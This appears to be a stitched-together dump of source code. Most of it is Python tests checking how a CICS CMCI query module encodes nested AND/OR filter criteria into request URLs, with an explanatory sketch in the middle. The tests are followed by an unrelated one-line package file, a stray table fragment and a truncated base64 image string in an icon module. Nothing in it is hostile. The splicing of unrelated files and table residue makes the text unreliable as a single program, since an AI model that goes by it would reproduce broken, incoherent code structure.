'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28NOT%28FOO%3D%3D%27BAR%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'attribute': 'FOO',
'operator': '!=',
'value': 'BAR'
}
}
})
def test_complex_filter_and_or(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20OR%20%28BING%3D%272%27%29%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20OR%20%28BING%3D%272%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'value': 'BAR'
}, {
'attribute': 'BAT',
'value': 'BAZ'
}, {
'or': [{
'attribute': 'BING',
'operator': '=',
'value': '1'
}, {
'attribute': 'BING',
'value': '2'
}]
}]
}
}
})
def test_complex_filter_and_and(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20AND%20%28BING%3D%272%27%29%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%3D%27BAZ%27%29%20AND%20%28'
'%28BING%3D%271%27%29%20AND%20%28BING%3D%272%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'value': 'BAR'
}, {
'attribute': 'BAT',
'operator': '==',
'value': 'BAZ'
}, {
'and': [{
'attribute': 'BING',
'value': '1'
}, {
'attribute': 'BING',
'value': '2'
}]
}]
}
}
})
def test_complex_filter_or_or(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE,
parameters='?CRITERIA=%28FOO%3E%3D%27BAR%27%29%20OR%20%28%28BING%3D%3D%271%27%29%20OR%20'
'%28BING%3D%272%27%29%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3E%3D%27BAR%27%29%20OR%20%28%28BING%3D%3D%271%27%29%20OR%20'
'%28BING%3D%272%27%29%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'or': [{
'attribute': 'FOO',
'operator': '>=',
'value': 'BAR'
}, {
'or': [{
'attribute': 'BING',
'operator': 'IS',
'value': '1'
}, {
'attribute': 'BING',
'operator': 'EQ',
'value': '2'
}]
}]
}
}
})
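The complex_filter cases render each leaf as (ATTRIBUTE OPERATOR 'VALUE'), join siblings with AND/OR, and wrap nested groups in an extra pair of parentheses before percent-encoding. A recursive sketch of that rendering (to_criteria is hypothetical and only handles the default '=' operator, not aliases like GT and IS or the NOT rewrite for '!='):

```python
from urllib.parse import quote


def to_criteria(node, nested=False):
    # Leaf: (ATTR='VALUE'); composite: children joined by AND/OR and
    # wrapped in parentheses when they sit inside another group.
    if 'attribute' in node:
        return "(%s%s'%s')" % (node['attribute'],
                               node.get('operator', '='),
                               node['value'])
    key = 'and' if 'and' in node else 'or'
    joined = (' %s ' % key.upper()).join(to_criteria(c, nested=True)
                                         for c in node[key])
    return '(%s)' % joined if nested else joined


# Same shape as the test_complex_filter_and_or request above.
flt = {'and': [{'attribute': 'FOO', 'value': 'BAR'},
               {'attribute': 'BAT', 'value': 'BAZ'},
               {'or': [{'attribute': 'BING', 'value': '1'},
                       {'attribute': 'BING', 'value': '2'}]}]}
assert quote(to_criteria(flt)) == (
    '%28FOO%3D%27BAR%27%29%20AND%20%28BAT%3D%27BAZ%27%29%20AND%20%28'
    '%28BING%3D%271%27%29%20OR%20%28BING%3D%272%27%29%29')
```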
def test_complex_filter_invalid_and_or_combo(cmci_module): # type: (CMCITestHelper) -> None
cmci_module.expect({
'msg': 'parameters are mutually exclusive: attribute|and|or found in resources -> complex_filter',
'failed': True
})
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}],
'or': [{
'attribute': 'FOO',
'operator': '=',
'value': 'BAR'
}, {
'attribute': 'GOO',
'operator': '=',
'value': 'LAR'
}]
}
}
})
def test_query_criteria_complex_filter_no_value(cmci_module):
cmci_module.expect({
'msg': 'parameters are required together: attribute, value found in resources -> complex_filter -> and',
'failed': True
})
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO'
}, {
'attribute': 'BAR',
'value': 'BOO'
}]
}
}
})
def test_complex_filter_operator_letters(cmci_module): # type: (CMCITestHelper) -> None
records = [{'name': 'bat', 'dsname': 'STEWF.BLOP.BLIP'}]
cmci_module.stub_records('GET', 'cicslocalfile', records, scope=SCOPE, parameters='?CRITERIA=%28FOO%3E%27BAR%27%29')
cmci_module.expect(result(
'https://winmvs2c.hursley.ibm.com:26040/CICSSystemManagement/'
'cicslocalfile/CICSEX56/IYCWEMW2?CRITERIA=%28FOO%3E%27BAR%27%29',
records=records
))
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'attribute': 'FOO',
'operator': 'GT',
'value': 'BAR'
}
}
})
def test_complex_filter_invalid_and_attribute(cmci_module): # type: (CMCITestHelper) -> None
cmci_module.expect({
'msg': 'parameters are mutually exclusive: attribute|and|or, and|value found in resources -> complex_filter',
'failed': True
})
cmci_module.run(cmci_get, {
'cmci_host': HOST,
'cmci_port': PORT,
'context': CONTEXT,
'scope': 'IYCWEMW2',
'type': 'cicslocalfile',
'resources': {
'complex_filter': {
'and': [{
'attribute': 'FOO',
'value': 'BAR'
}, {
'attribute': 'BAT',
'operator': '==',
'value': 'BAZ'
}],
'attribute': 'FOO2',
'value': 'BAR2'
}
}
})
def result(url, records, http_status='OK', http_status_code=200):
return {
'changed': False,
'connect_version': '0560',
'cpsm_reason': '',
'cpsm_reason_code': 0,
'cpsm_response': 'OK',
'cpsm_response_code': 1024,
'http_status': http_status,
'http_status_code': http_status_code,
'record_count': len(records),
'records': records,
'request': {
'url': url,
'method': 'GET',
'body': None
}
}
# notecomputer/__init__.py (notechats/notepad, Apache-2.0)
print("import notecomputer")
# xtools/icon.py (hxler123/tools, MIT)
] | null | null | null | base64_img = """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